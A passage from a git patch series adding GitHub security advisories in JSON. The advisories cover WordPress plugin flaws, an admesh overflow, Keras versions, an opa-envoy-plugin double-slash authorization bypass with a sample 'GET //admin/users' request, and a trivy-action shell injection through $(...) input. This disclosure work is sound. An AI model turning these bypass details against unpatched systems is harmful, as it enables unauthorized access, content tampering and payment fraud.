with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1941" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455440/wp-event-aggregator#file18" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/50d8f1e0-2022-4fe1-b384-ca762a032d3c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file From 624ae4cb87ec63f45622fd36ef58c9a94b7a2d4d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 12:32:38 +0000 Subject: [PATCH 149/215] Publish Advisories GHSA-23h7-68rq-jgvf GHSA-2pc4-pm2m-q53r GHSA-3vq8-64jx-f882 GHSA-9pr5-g9xr-gp22 GHSA-fq68-cwcx-p92f GHSA-pm8v-w3f2-2hxx GHSA-vcj6-96x2-26j3 GHSA-w2w8-j4gc-v26q --- .../GHSA-23h7-68rq-jgvf.json | 56 ++++++++++++++++ .../GHSA-2pc4-pm2m-q53r.json | 48 ++++++++++++++ .../GHSA-3vq8-64jx-f882.json | 44 +++++++++++++ .../GHSA-9pr5-g9xr-gp22.json | 48 ++++++++++++++ .../GHSA-fq68-cwcx-p92f.json | 52 +++++++++++++++ .../GHSA-pm8v-w3f2-2hxx.json | 48 ++++++++++++++ .../GHSA-vcj6-96x2-26j3.json | 64 +++++++++++++++++++ .../GHSA-w2w8-j4gc-v26q.json | 48 ++++++++++++++ 8 files changed, 408 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json diff --git a/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json b/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json new file mode 100644 index 0000000000000..5630e02bd42b0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23h7-68rq-jgvf", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2025-13727" + ], + "details": "The Video Share VOD – Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 2.7.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13727" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/tags/2.7.11/inc/shortcodes.php#L2226" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/tags/2.7.11/inc/shortcodes.php#L748" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/trunk/inc/shortcodes.php#L2226" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/trunk/inc/shortcodes.php#L748" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463296" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/776a441b-1bb8-46ea-9884-4abf562f6e5c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json b/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json new file mode 100644 index 0000000000000..e79fa4e9211d6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2pc4-pm2m-q53r", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2025-14799" + ], + "details": "The Brevo - Email, SMS, Web Push, Chat, and more. plugin for WordPress is vulnerable to authorization bypass due to type juggling in all versions up to, and including, 3.3.0. This is due to the use of loose comparison (==) instead of strict comparison (===) when validating the installation ID in the `/wp-json/mailin/v1/mailin_disconnect` REST API endpoint. This makes it possible for unauthenticated attackers to disconnect the Brevo integration, delete the API key, remove all subscription forms, and reset plugin settings by sending a boolean `true` value for the `id` parameter, which bypasses the authorization check through PHP type juggling.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14799" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mailin/tags/3.2.9/sendinblue.php#L1795" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mailin/tags/3.2.9/sendinblue.php#L1833" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3448639" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f29e5b19-2505-4b02-92c7-071833de6bc2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T12:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json b/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json new file mode 100644 index 0000000000000..bb163125f7acc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vq8-64jx-f882", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2025-11185" + ], + "details": "The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cmplz-accept-link shortcode in all versions up to, and including, 7.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11185" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.2/documents/class-document.php#L1174" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.2/documents/class-document.php#L21" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f0533fca-a4de-44f0-bea0-1df6a41709ca?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json b/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json new file mode 100644 index 0000000000000..e0d8672576c9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pr5-g9xr-gp22", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-1942" + ], + "details": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the b2s_curation_draft AJAX action in all versions up to, and including, 8.7.4. The curationDraft() function only verifies current_user_can('read') without checking whether the user has edit_post permission for the target post. Combined with the plugin granting UI access and nonce exposure to all roles, this makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the title and content of arbitrary posts and pages by supplying a target post ID via the 'b2s-draft-id' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1942" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.3/includes/Ajax/Post.php#L159" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.3/includes/B2S/Curation/Save.php#L39" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php?rev=3462464" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/930e7fd6-ae0b-465a-aa93-04ef80011d32?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json b/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json new file mode 100644 index 0000000000000..079d7a6c660d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq68-cwcx-p92f", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2025-14444" + ], + "details": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to payment bypass due to insufficient verification of data authenticity on the 'process_paypal_sdk_payment' function in all versions up to, and including, 6.0.6.9. This is due to the plugin trusting client-supplied values for payment verification without validating that the payment actually went through PayPal. This makes it possible for unauthenticated attackers to bypass paid registration by manipulating payment status and activating their account without completing a real PayPal payment.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14444" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/tags/6.0.6.7/includes/class_registration_magic.php#L232" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/tags/6.0.6.7/services/class_rm_paypal_service.php#L324" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/services/class_rm_paypal_service.php#L324" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3426151" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0633bf06-6580-4feb-b98a-c465df3e2bed?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json new file mode 100644 index 0000000000000..fac368002aa55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm8v-w3f2-2hxx", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2026-2126" + ], + "details": "The User Submitted Posts – Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 20260113. This is due to the `usp_get_submitted_category()` function accepting user-submitted category IDs from the POST body without validating them against the admin-configured allowed categories stored in `usp_options['categories']`. This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones, by crafting a direct POST request with manipulated `user-submitted-category[]` values, bypassing the frontend category restrictions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3463696%40user-submitted-posts%2Ftrunk&old=3456521%40user-submitted-posts%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json new file mode 100644 index 0000000000000..9a1c8c221619a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vcj6-96x2-26j3", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2653" + ], + "details": "A security flaw has been discovered in admesh up to 0.98.5. This issue affects the function stl_check_normal_vector of the file src/normals.c. Performing a manipulation results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. It looks like this product is not really maintained anymore.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2653" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65#issuecomment-3804571402" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh" + }, + { + "type": "WEB", + "url": "https://github.com/user-attachments/files/24878279/id.000035.sig.06.src.000550.time.910126.execs.241742.op.havoc.rep.5.zip" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752596" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json new file mode 100644 index 0000000000000..a744ef0b04dbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2w8-j4gc-v26q", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2426" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2426" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/d3470a8971d9043438c8aad281cf37d14fefa208" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file From 0be8ae264144d278ce4b2506bc750e2337001b9f Mon Sep 17 00:00:00 2001 From: Maksim Moiseikin Date: Wed, 18 Feb 2026 16:14:41 +0100 Subject: [PATCH 150/215] Improve GHSA-xfhx-r7ww-5995 --- .../GHSA-xfhx-r7ww-5995.json | 28 ++++++++++++++++++- 1 file changed, 27 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json index c5bfb830d442c..2911ab16e66df 100644 --- a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json +++ b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xfhx-r7ww-5995", - "modified": "2026-01-15T20:11:41Z", + "modified": "2026-01-15T20:11:51Z", "published": "2026-01-15T15:31:19Z", "aliases": [ "CVE-2026-0897" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 3.13.0" } + }, + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.12.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.12.0" + } } ], "references": [ @@ -47,6 +69,10 @@ "type": "WEB", "url": "https://github.com/keras-team/keras/pull/21880" }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/pull/22081" + }, { "type": "WEB", "url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6" From 4ef3aa115961db820ee061dc512929b90bd4c052 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:26:18 +0000 Subject: [PATCH 151/215] Publish Advisories GHSA-9f29-v6mm-pw6w GHSA-9p44-j4g5-cfx5 --- .../GHSA-9f29-v6mm-pw6w.json | 68 +++++++++++++++++++ .../GHSA-9p44-j4g5-cfx5.json | 65 ++++++++++++++++++ 2 files changed, 133 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json diff --git a/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json b/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json new file mode 100644 index 0000000000000..0808e742888aa --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9f29-v6mm-pw6w", + "modified": "2026-02-18T15:25:04Z", + "published": "2026-02-18T15:25:04Z", + "aliases": [ + "CVE-2026-26205" + ], + "summary": "opa-envoy-plugin has a Authorization Bypass via Double-Slash Path Misinterpretation in input.parsed_path", + "details": "A security vulnerability has been discovered in how the `input.parsed_path` field is constructed. HTTP request paths are treated as full URIs when parsed; interpreting leading path segments prefixed with double slashes (`//`) as [authority](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2) components, and therefore dropping them from the parsed path. This creates a path interpretation mismatch between authorization policies and backend servers, enabling attackers to bypass access controls by crafting requests where the authorization filter evaluates a different path than the one ultimately served.\n\n#### Attack example\n\n**HTTP request:**\n\n```\nGET //admin/users HTTP/1.1\nHost: example.com\n```\n\n**Policy sees:**\n\nThe leading `//admin` path segment is interpreted as an authority component, and dropped from `input.parsed_path` field:\n\n\n```json\n{\n \"parsed_path\": [\"users\"]\n}\n```\n\n**Backend receives:**\n\n`//admin/users` path, normalized to `/admin/users`.\n\n#### Affected Request Pattern Examples\n\n| Request path | `input.parsed_path` | `input.attributes.request.http.path` | Discrepancy |\n| - | - | - | - |\n| / | [\"\"] | / | ✅ None |\n| //foo | [\"\"] | //foo| ❌ Mismatch |\n| /admin | [\"admin\"] | /admin | ✅ None |\n| /admin/users | [\"admin\", \"users\"] | /admin/users | ✅ None |\n| //admin/users | [\"users\"] | //admin/users | ❌ Mismatch |\n\n### Impact\n\nUsers are impacted if all the following conditions apply:\n\n1. Protected resources are path-hierarchical (e.g., `/admin/users` vs `/users`)\n2. Authorization policies use `input.parsed_path` for path-based decisions\n3. Backend servers apply lenient path normalization\n\n### Patches\n\nGo: `v1.13.2-envoy-2`\nDocker: `1.13.2-envoy-2`, `1.13.2-envoy-2-static`\n\n### Workarounds\n\nUsers who cannot immediately upgrade opa-envoy-plugin are recommended to apply one, or more, of the workarrounds described below.\n\n#### 1. Enable the `merge_slashes` Envoy configuration option\n\nAs per [Envoy best practices](https://www.envoyproxy.io/docs/envoy/v1.37.0/configuration/best_practices/edge.html), enabling the [merge_slashes](https://www.envoyproxy.io/docs/envoy/latest/api-v3/extensions/filters/network/http_connection_manager/v3/http_connection_manager.proto#envoy-v3-api-field-extensions-filters-network-http-connection-manager-v3-httpconnectionmanager-merge-slashes) configuration option in Envoy will remove redundant slashes from the request path before filtering is applied, effectively mitigating the `input.parsed_path` issue described in this advisory.\n\n\n#### 2. Use `input.attributes.request.http.path` instead of `input.parsed_path` in policies\n\nThe `input.attributes.request.http.path` field contains the unprocessed, raw request path. Users are recommended to update any policy using `input.parsed_path` to instead use the `input.attributes.request.http.path` field.\n\n##### Example ####\n\n```rego\npackage example\n\n# Use instead of input.parsed_path\nparsed_path := split( # tokenize into array\n\ttrim_left( # drop leading slashes\n\t\turlquery.decode(input.attributes.request.http.path), # url-decode the path\n\t\t\"/\",\n\t),\n\t\"/\",\n)\n```", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/open-policy-agent/opa-envoy-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.13.2-envoy-2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.13.1-envoy" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin/security/advisories/GHSA-9f29-v6mm-pw6w" + }, + { + "type": "WEB", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin/commit/58c44d4ec408d5852d1d0287599e7d5c5e2bc5c3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin" + }, + { + "type": "WEB", + "url": "https://github.com/open-policy-agent/opa-envoy-plugin/releases/tag/v1.13.2-envoy-2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T15:25:04Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json b/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json new file mode 100644 index 0000000000000..7fb49ffd749a1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9p44-j4g5-cfx5", + "modified": "2026-02-18T15:24:43Z", + "published": "2026-02-18T15:24:43Z", + "aliases": [ + "CVE-2026-26189" + ], + "summary": "Trivy Action has a script injection via sourced env file in composite action", + "details": "Command Injection in aquasecurity/trivy-action via Unsanitized Environment Variable Export\n\n\nA command injection vulnerability exists in `aquasecurity/trivy-action` due to improper handling of action inputs when exporting environment variables. The action writes `export VAR=` lines to `trivy_envs.txt` based on user-supplied inputs and subsequently sources this file in `entrypoint.sh`.\n\nBecause input values are written without appropriate shell escaping, attacker-controlled input containing shell metacharacters (e.g., `$(...)`, backticks, or other command substitution syntax) may be evaluated during the sourcing process. This can result in arbitrary command execution within the GitHub Actions runner 